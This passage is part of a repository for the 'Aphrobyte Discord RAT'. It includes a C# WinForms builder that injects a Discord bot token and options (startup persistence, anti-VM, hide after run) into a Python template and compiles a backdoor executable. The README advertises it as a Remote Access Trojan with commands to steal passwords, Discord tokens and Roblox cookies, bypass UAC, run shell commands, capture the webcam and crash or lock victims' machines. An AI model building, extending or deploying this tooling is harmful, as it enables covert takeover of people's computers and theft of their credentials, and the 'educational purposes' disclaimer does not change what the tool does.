this.checkBox1.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F); 212 | this.checkBox1.ForeColor = System.Drawing.SystemColors.ButtonFace; 213 | this.checkBox1.Location = new System.Drawing.Point(117, 112); 214 | this.checkBox1.Name = "checkBox1"; 215 | this.checkBox1.Size = new System.Drawing.Size(108, 20); 216 | this.checkBox1.TabIndex = 14; 217 | this.checkBox1.Text = "Add to startup"; 218 | this.checkBox1.UseVisualStyleBackColor = true; 219 | // 220 | // textBox5 221 | // 222 | this.textBox5.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 223 | this.textBox5.Location = new System.Drawing.Point(143, 57); 224 | this.textBox5.Name = "textBox5"; 225 | this.textBox5.Size = new System.Drawing.Size(216, 20); 226 | this.textBox5.TabIndex = 13; 227 | // 228 | // label7 229 | // 230 | this.label7.AutoSize = true; 231 | this.label7.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 232 | this.label7.ForeColor = System.Drawing.SystemColors.ButtonFace; 233 | this.label7.Location = new System.Drawing.Point(18, 234); 234 | this.label7.Name = "label7"; 235 | this.label7.Size = new System.Drawing.Size(116, 16); 236 | this.label7.TabIndex = 10; 237 | this.label7.Text = "Backdoor location"; 238 | // 239 | // label8 240 | // 241 | this.label8.AutoSize = true; 242 | this.label8.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 243 | this.label8.ForeColor = System.Drawing.SystemColors.ButtonFace; 244 | this.label8.Location = new System.Drawing.Point(18, 61); 245 | this.label8.Name = "label8"; 246 | this.label8.Size = new System.Drawing.Size(103, 16); 247 | this.label8.TabIndex = 12; 248 | this.label8.Text = "Backdoor name"; 249 | // 250 | // comboBox1 251 | // 252 | this.comboBox1.FormattingEnabled = true; 253 | this.comboBox1.Items.AddRange(new object[] { 254 | "\\\\AppData\\\\Roaming\\\\", 255 | "\\\\AppData\\\\Roaming\\\\Microsoft\\\\"}); 256 | this.comboBox1.Location = new System.Drawing.Point(161, 233); 257 | this.comboBox1.Name = "comboBox1"; 258 | this.comboBox1.Size = new System.Drawing.Size(124, 21); 259 | this.comboBox1.TabIndex = 9; 260 | // 261 | // label6 262 | // 263 | this.label6.AutoSize = true; 264 | this.label6.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 265 | this.label6.ForeColor = System.Drawing.SystemColors.ButtonFace; 266 | this.label6.Location = new System.Drawing.Point(18, 18); 267 | this.label6.Name = "label6"; 268 | this.label6.Size = new System.Drawing.Size(94, 16); 269 | this.label6.TabIndex = 8; 270 | this.label6.Text = "Process name"; 271 | // 272 | // textBox4 273 | // 274 | this.textBox4.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 275 | this.textBox4.Location = new System.Drawing.Point(143, 14); 276 | this.textBox4.Name = "textBox4"; 277 | this.textBox4.Size = new System.Drawing.Size(216, 20); 278 | this.textBox4.TabIndex = 7; 279 | // 280 | // button1 281 | // 282 | this.button1.Font = new System.Drawing.Font("Microsoft Sans Serif", 11.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 283 | this.button1.Location = new System.Drawing.Point(12, 374); 284 | this.button1.Name = "button1"; 285 | this.button1.Size = new System.Drawing.Size(180, 31); 286 | this.button1.TabIndex = 10; 287 | this.button1.Text = "Install requirements"; 288 | this.button1.UseVisualStyleBackColor = true; 289 | this.button1.Click += new System.EventHandler(this.button1_Click); 290 | // 291 | // button2 292 | // 293 | this.button2.Font = new System.Drawing.Font("Microsoft Sans Serif", 11.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 294 | this.button2.Location = new System.Drawing.Point(12, 422); 295 | this.button2.Name = "button2"; 296 | this.button2.Size = new System.Drawing.Size(180, 31); 297 | this.button2.TabIndex = 11; 298 | this.button2.Text = "Start compiling"; 299 | this.button2.UseVisualStyleBackColor = true; 300 | this.button2.Click += new System.EventHandler(this.button2_Click); 301 | // 302 | // checkBox5 303 | // 304 | this.checkBox5.AutoSize = true; 305 | this.checkBox5.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F); 306 | this.checkBox5.ForeColor = System.Drawing.SystemColors.ButtonFace; 307 | this.checkBox5.Location = new System.Drawing.Point(210, 381); 308 | this.checkBox5.Name = "checkBox5"; 309 | this.checkBox5.Size = new System.Drawing.Size(135, 20); 310 | this.checkBox5.TabIndex = 18; 311 | this.checkBox5.Text = "Upgrade modules"; 312 | this.checkBox5.UseVisualStyleBackColor = true; 313 | // 314 | // pictureBox2 315 | // 316 | this.pictureBox2.BackgroundImageLayout = System.Windows.Forms.ImageLayout.None; 317 | this.pictureBox2.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox2.Image"))); 318 | this.pictureBox2.Location = new System.Drawing.Point(419, 441); 319 | this.pictureBox2.Name = "pictureBox2"; 320 | this.pictureBox2.Size = new System.Drawing.Size(28, 31); 321 | this.pictureBox2.SizeMode = System.Windows.Forms.PictureBoxSizeMode.Zoom; 322 | this.pictureBox2.TabIndex = 19; 323 | this.pictureBox2.TabStop = false; 324 | // 325 | // label9 326 | // 327 | this.label9.AutoSize = true; 328 | this.label9.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Italic, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 329 | this.label9.ForeColor = System.Drawing.SystemColors.ButtonFace; 330 | this.label9.Location = new System.Drawing.Point(453, 449); 331 | this.label9.Name = "label9"; 332 | this.label9.Size = new System.Drawing.Size(325, 16); 333 | this.label9.TabIndex = 20; 334 | this.label9.Text = "This project has been created by RIOT Administration"; 335 | // 336 | // Form1 337 | // 338 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F); 339 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; 340 | this.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(49)))), ((int)(((byte)(49)))), ((int)(((byte)(49))))); 341 | this.ClientSize = new System.Drawing.Size(799, 484); 342 | this.Controls.Add(this.label9); 343 | this.Controls.Add(this.pictureBox2); 344 | this.Controls.Add(this.checkBox5); 345 | this.Controls.Add(this.button2); 346 | this.Controls.Add(this.button1); 347 | this.Controls.Add(this.label5); 348 | this.Controls.Add(this.label4); 349 | this.Controls.Add(this.panel2); 350 | this.Controls.Add(this.panel1); 351 | this.Controls.Add(this.pictureBox1); 352 | this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.SizableToolWindow; 353 | this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); 354 | this.Name = "Form1"; 355 | this.Text = "Aphrobyte Discord RAT @ RIOT Administration"; 356 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit(); 357 | this.panel1.ResumeLayout(false); 358 | this.panel1.PerformLayout(); 359 | this.panel2.ResumeLayout(false); 360 | this.panel2.PerformLayout(); 361 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox2)).EndInit(); 362 | this.ResumeLayout(false); 363 | this.PerformLayout(); 364 | 365 | } 366 | 367 | #endregion 368 | 369 | private System.Windows.Forms.PictureBox pictureBox1; 370 | private System.Windows.Forms.TextBox textBox1; 371 | private System.Windows.Forms.Label label1; 372 | private System.Windows.Forms.Label label2; 373 | private System.Windows.Forms.TextBox textBox2; 374 | private System.Windows.Forms.Label label3; 375 | private System.Windows.Forms.TextBox textBox3; 376 | private System.Windows.Forms.Panel panel1; 377 | private System.Windows.Forms.Label label4; 378 | private System.Windows.Forms.Label label5; 379 | private System.Windows.Forms.Panel panel2; 380 | private System.Windows.Forms.Label label6; 381 | private System.Windows.Forms.TextBox textBox4; 382 | private System.Windows.Forms.TextBox textBox5; 383 | private System.Windows.Forms.Label label7; 384 | private System.Windows.Forms.Label label8; 385 | private System.Windows.Forms.ComboBox comboBox1; 386 | private System.Windows.Forms.CheckBox checkBox4; 387 | private System.Windows.Forms.CheckBox checkBox2; 388 | private System.Windows.Forms.CheckBox checkBox1; 389 | private System.Windows.Forms.Button button1; 390 | private System.Windows.Forms.Button button2; 391 | private System.Windows.Forms.CheckBox checkBox5; 392 | private System.Windows.Forms.PictureBox pictureBox2; 393 | private System.Windows.Forms.Label label9; 394 | } 395 | } 396 | 397 | -------------------------------------------------------------------------------- /Form1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Drawing; 6 | using System.Linq; 7 | using System.Text; 8 | using System.Threading.Tasks; 9 | using System.IO; 10 | using System.Windows.Forms; 11 | using System.Diagnostics; 12 | 13 | namespace aphrobyte_discord_rat 14 | { 15 | public partial class Form1 : Form 16 | { 17 | public Form1() 18 | { 19 | InitializeComponent(); 20 | } 21 | 22 | static void Compile(string guild_id, string bot_token, string alerts_id, string process_name, string backdoor_name, string backdoor_location, bool startup, bool antivm, bool hide) 23 | { 24 | if (Directory.Exists("dist")) 25 | { 26 | Directory.Delete("dist", true); 27 | } 28 | if (Directory.Exists("build")) 29 | { 30 | Directory.Delete("build", true); 31 | } 32 | if (Directory.Exists($"{backdoor_name}.spec")) 33 | { 34 | Directory.Delete($"{backdoor_name}.spec", true); 35 | } 36 | if (File.Exists(".buildmodules\\main.py")) 37 | { 38 | File.Delete(".buildmodules\\main.py"); 39 | } 40 | 41 | if (!backdoor_name.EndsWith(".exe")) 42 | { 43 | backdoor_name = $"{backdoor_name}.exe"; 44 | } 45 | 46 | string sample_path = ".buildmodules\\sample.py"; 47 | File.Copy(sample_path, ".buildmodules\\main.py"); File.Move(".buildmodules\\main.py", ".buildmodules\\main.py"); 48 | 49 | string unconfigured = File.ReadAllText(".buildmodules\\main.py"); 50 | unconfigured = unconfigured.Replace("{guildid}", guild_id); 51 | unconfigured = unconfigured.Replace("{token}", bot_token); 52 | unconfigured = unconfigured.Replace("{announcements}", alerts_id); 53 | unconfigured = unconfigured.Replace("{processname}", process_name); 54 | unconfigured = unconfigured.Replace("{backdoorlocation}", backdoor_location); 55 | unconfigured = unconfigured.Replace("\"{autostart}\"", startup.ToString()); 56 | unconfigured = unconfigured.Replace("\"{antivm}\"", antivm.ToString()); 57 | unconfigured = unconfigured.Replace("\"{hideafterexec}\"", hide.ToString()); 58 | 59 | File.WriteAllText(".buildmodules\\main.py", unconfigured); 60 | 61 | ProcessStartInfo ps = new ProcessStartInfo(); 62 | ps.FileName = "cmd.exe"; 63 | ps.WindowStyle = ProcessWindowStyle.Normal; 64 | ps.Arguments = $"/c title \"Compiling configuration, please wait...\" && python -m PyInstaller --onefile --noconsole --name=\"{backdoor_name}\" .buildmodules\\main.py && title \"Backdoor compiled \" && move \"dist\\{backdoor_name}\" {backdoor_name} && echo . && pause"; 65 | Process.Start(ps); 66 | } 67 | 68 | private void button2_Click(object sender, EventArgs e) 69 | { 70 | bool filledtextbox_1 = !string.IsNullOrWhiteSpace(textBox1.Text); 71 | bool filledtextbox_2 = !string.IsNullOrWhiteSpace(textBox2.Text); 72 | bool filledtextbox_3 = !string.IsNullOrWhiteSpace(textBox3.Text); 73 | bool filledtextbox_4 = !string.IsNullOrWhiteSpace(textBox4.Text); 74 | bool filledtextbox_5 = !string.IsNullOrWhiteSpace(textBox5.Text); 75 | bool combobox_selected = comboBox1.SelectedIndex != -1; 76 | 77 | if (filledtextbox_1 && filledtextbox_2 && filledtextbox_3 && filledtextbox_4 && filledtextbox_5 && combobox_selected) 78 | { 79 | string guildid = textBox1.Text; 80 | string bottoken = textBox2.Text; 81 | string alertsid = textBox3.Text; 82 | string processname = textBox4.Text; 83 | string backdoorname = textBox5.Text; 84 | string backdoorlocation = comboBox1.Text; 85 | bool startup = checkBox1.Checked; 86 | bool antivm = checkBox2.Checked; 87 | bool hide = checkBox4.Checked; 88 | Compile(guildid, bottoken, alertsid, processname, backdoorname, backdoorlocation, startup, antivm, hide); 89 | 90 | } else 91 | { 92 | MessageBox.Show("Please complete every field and choose a backdoor location.", "Configuration incomplete", MessageBoxButtons.OK, MessageBoxIcon.Error); 93 | } 94 | } 95 | 96 | private void button1_Click(object sender, EventArgs e) 97 | { 98 | if (checkBox5.Checked != true) 99 | { 100 | ProcessStartInfo ps = new ProcessStartInfo(); 101 | ps.FileName = "cmd.exe"; 102 | ps.WindowStyle = ProcessWindowStyle.Normal; 103 | ps.Arguments = "/c title \"Installing requirements, please wait...\" && pip install -r .buildmodules\\requirements.txt && title \"Requirements installed\" && echo . && pause"; 104 | Process.Start(ps); 105 | } 106 | else 107 | { 108 | ProcessStartInfo ps = new ProcessStartInfo(); 109 | ps.FileName = "cmd.exe"; 110 | ps.WindowStyle = ProcessWindowStyle.Normal; 111 | ps.Arguments = "/c title \"Installing and upgrading requirements, please wait...\" && pip install --upgrade pip && pip install --upgrade wheel && pip install --upgrade setuptools && pip install -U -r .buildmodules\\requirements.txt && title \"Requirements installed\" && echo . && pause"; 112 | Process.Start(ps); 113 | } 114 | } 115 | } 116 | } 117 | -------------------------------------------------------------------------------- /Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Threading.Tasks; 5 | using System.Windows.Forms; 6 | 7 | namespace aphrobyte_discord_rat 8 | { 9 | internal static class Program 10 | { 11 | /// 12 | /// The main entry point for the application. 13 | /// 14 | [STAThread] 15 | static void Main() 16 | { 17 | Application.EnableVisualStyles(); 18 | Application.SetCompatibleTextRenderingDefault(false); 19 | Application.Run(new Form1()); 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![aphrobytelogo](https://user-images.githubusercontent.com/71534600/216463962-fa72bec6-c7b1-417e-9c1f-116346961b52.png) 2 | # Aphrobyte RAT 3 | > A powerful Remote Access Trojan that uses Discord as C2. This means you can control your devices through Discord. 4 | 5 | # Aphrobyte Plus: https://rentry.co/aphrobyteplus-trojan 6 | 7 | Telegram : https://t.me/riotadministration 8 | 9 | ## Installation 10 | You can install the tool from [the latest release](https://github.com/Riot-Byte/aphrobyte-rat/releases/tag/v1.9.2). 11 | 12 | ## Current features 13 | 14 | - Surveillance modules 15 | - Fun modules 16 | - Sanctioning 17 | - Communication (chats with the infected user) 18 | - Multiple agent handling (get multiple people at once) 19 | - Persistence 20 | - File management modules 21 | - Information gathering 22 | - Undetected by antivirus (sorry not anymore) 23 | 24 | ## Commands 25 | 26 | - **!help** - Shows this message 27 | - **!startup** - Adds the file to startup. 28 | - **!exit** - Stop the RAT from working. 29 | - **!usagelist** - Returns a list of active users. 30 | - **!admin_check** - Checks if you are admin on target computer. 31 | - **!bypass_uac** - Attempts to bypass UAC to get admin privileges. 32 | - **!shell** - Run a shell command 33 | 34 | ### Surveillance 35 | 36 | - **!screenshot** - Sends a screenshot of the target machine 37 | - **!idletime** - Displays for how long the user has been AFK 38 | - **!webcam_capture** - Capture a picture of the webcam. 39 | - **!tasklist** - Returns a list of active tasks. 40 | 41 | ### File management 42 | 43 | - **!chdir** - Changes the current directory. **!chdir <** to go back one directory. 44 | - **!chdisk** - Changes the current disk. (E, C, D, etc.) 45 | - **!ls** - Displays all items in the current directory. 46 | - **!download** - Downloads a file from the specified path. 47 | - **!upload** - Uploads a file to the specified path. 48 | - **!taskkill** - Kills the specified task. 49 | - **!startfile** - Starts a file. 50 | - **!delfile** - Deletes a file. 51 | - **!hidefile** \ **!unhidefile** - Hides/unhides a file. 52 | 53 | ### Information gathering 54 | 55 | - **!whois** - Prints the user"s name 56 | - **!getip** - Gets the current user's IP address 57 | - **!clipboard** - Returns a string of the user's clipboard. 58 | - **!stealpasswords** - Steal all the passwords from the device. 59 | - **!grabroblox** - Grabs the user's Roblox account cookie. 60 | - **!hardware_list** - Lists the user's hardware on newlines. 61 | 62 | **!grabdiscord** - Fetches the user's Discord account token. 63 | 64 | ### Sanctioning 65 | 66 | - **!bsod** - Blue screens the computer. 67 | - **!disabletaskmgr** \ **!enabletaskmanager** - Disable/enable task manager. 68 | - **!logoff** - Logs the user off. 69 | - **!shutdown** - Shuts the user's PC off. 70 | - **!restart** - Restarts the user's PC. 71 | - **!blockscreen** - Blocks the user's screen. (IRREVERSIBLE UNTIL USER RESTARTS) 72 | - **!critproc** - Makes the RAT a critical process, meaning if it's task killed the user will get a BSOD. 73 | - **!screenflip** - Rotates the user's screen 90 degrees. 74 | 75 | ### Fun 76 | 77 | - **!write** - Writes a sentence then presses enter. 78 | - **!setclipboard** - Sets the clipboard to the specified string of text. 79 | - **!forcedesktop** - Sends the user on desktop automatically. 80 | - **!messmouse** - Shakes the user's cursor when they try to move the mouse, run this command again to stop. 81 | - **!opensite** - Opens a site on the user's browser. 82 | - **!key_press** - Press a key. 83 | - **!showtaskbar** \ **!hidetaskbar** 84 | 85 | ### Communication 86 | 87 | - **!questionmsg** - Sends the user a question message. 88 | - **!warningmsg** - Sends the user a warning message. 89 | - **!errormsg** - Sends the user an error message. 90 | - **!infomsg** - Sends the user an informative message. 91 | 92 | ``` 93 | * You need to specify the usage ID after every command. Arguments come after. The usage ID will be sent at the start of every session. 94 | 95 | Example : !write (usage-id) (sentence) => !write 123456 Test sentence 96 | !questionmsg (usage-id) (message) => !questionmsg 123456 Test message 97 | ``` 98 | 99 | ## Disclaimer 100 | This tool was made for educational purposes only and self learning. The developer is not responsible for bad actions that originate from this tool. 101 | Publishing this tool under your name will result in a DMCA takedown. 102 | 103 | ## BTC Donations : **bc1qzx8ex62q8ujs5ea62vkjfrye3khqtmdepgaxen** 104 | -------------------------------------------------------------------------------- /aphrobyte-discord-rat.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {C04A8F04-BAA4-4743-BDE2-F042DB0BE037} 8 | WinExe 9 | aphrobyte_discord_rat 10 | aphrobyte-discord-rat 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | aphrobytelogo.ico 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | Form 54 | 55 | 56 | Form1.cs 57 | 58 | 59 | 60 | 61 | Form1.cs 62 | 63 | 64 | ResXFileCodeGenerator 65 | Resources.Designer.cs 66 | Designer 67 | 68 | 69 | True 70 | Resources.resx 71 | 72 | 73 | SettingsSingleFileGenerator 74 | Settings.Designer.cs 75 | 76 | 77 | True 78 | Settings.settings 79 | True 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | -------------------------------------------------------------------------------- /aphrobyte-discord-rat.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.6.33829.357 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "aphrobyte-discord-rat", "aphrobyte-discord-rat.csproj", "{C04A8F04-BAA4-4743-BDE2-F042DB0BE037}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {C04A8F04-BAA4-4743-BDE2-F042DB0BE037}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {C04A8F04-BAA4-4743-BDE2-F042DB0BE037}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {C04A8F04-BAA4-4743-BDE2-F042DB0BE037}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {C04A8F04-BAA4-4743-BDE2-F042DB0BE037}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {FA0C6F5F-AD52-49AD-8007-0C1B321870E1} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /aphrobytelogo.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Riot-Byte/aphrobyte-rat/5bf2b09f581506049818009aefadc3de43881a21/aphrobytelogo.ico --------------------------------------------------------------------------------